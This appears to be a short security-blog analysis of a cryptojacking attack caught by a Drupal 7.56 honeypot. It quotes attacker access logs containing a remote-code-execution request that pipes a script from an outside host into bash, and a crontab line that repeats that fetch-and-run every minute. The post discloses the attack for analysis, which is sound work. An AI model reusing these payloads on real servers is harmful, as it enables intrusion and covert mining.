Suppoie Crypto Hijack

We found an interesting hack using a Drupal 7.56 honeypot. The attacker used a specially crafted URL to pull down a jpeg image, which turned out to be a script. The script connects to a Monero mining pool, and starts mining crypto from the server automatically. Vulnerability used is via Curl in this version of Drupal.

Here’s all of the traffic from the attacker:

81.92.203.123 - - [24/Apr/2018:01:34:08 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 403 36607 "-" "Ruby"

81.92.203.123 - - [24/Apr/2018:02:00:41 +0000] "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://gmicameroon.com/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 200 21915 "-" "Ruby"

81.92.203.123 - - [24/Apr/2018:02:00:42 +0000] "POST /?q=file/ajax/name/%23value/form-RR2WlQ5bBKZlJcllzKJ16U3bf-IU_aIP8ALAzixqPZw HTTP/1.1" 200 1931 "-" "Ruby"

 

The file logo7.jpg pulled down from gmicameroon.com site is a script that runs the miner in /var/tmp/suppoie running as www-data on the device:

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
Created /var/tmp/suppoie (d9531f405d7231ac1e518e5bc3d1da8c) and config.json. The config.json file has embedded credentials to login to the mining pool under user

'47M4CxQoC46hxKL1De83oZ6J2sYDPqyKN2F6sovD5mSHAKA4SrwYXmMBBJ75waQb3qZDAf6uA9HMtg9h9PSMst1k1EsUdwp':

 

A crontab is created to keep the script going:

root@ubuntu /var/tmp # crontab -u www-data -l
* * * * * curl -s http://gmicameroon.com/logo7.jpg | bash -s

 

If you’re interested in doing analysis, I’ve added the code to download all of the files, password to the zip is infected.

Here’s an analysis courtesy of the JoeSandBox tool we often use to analyze Malware on this site.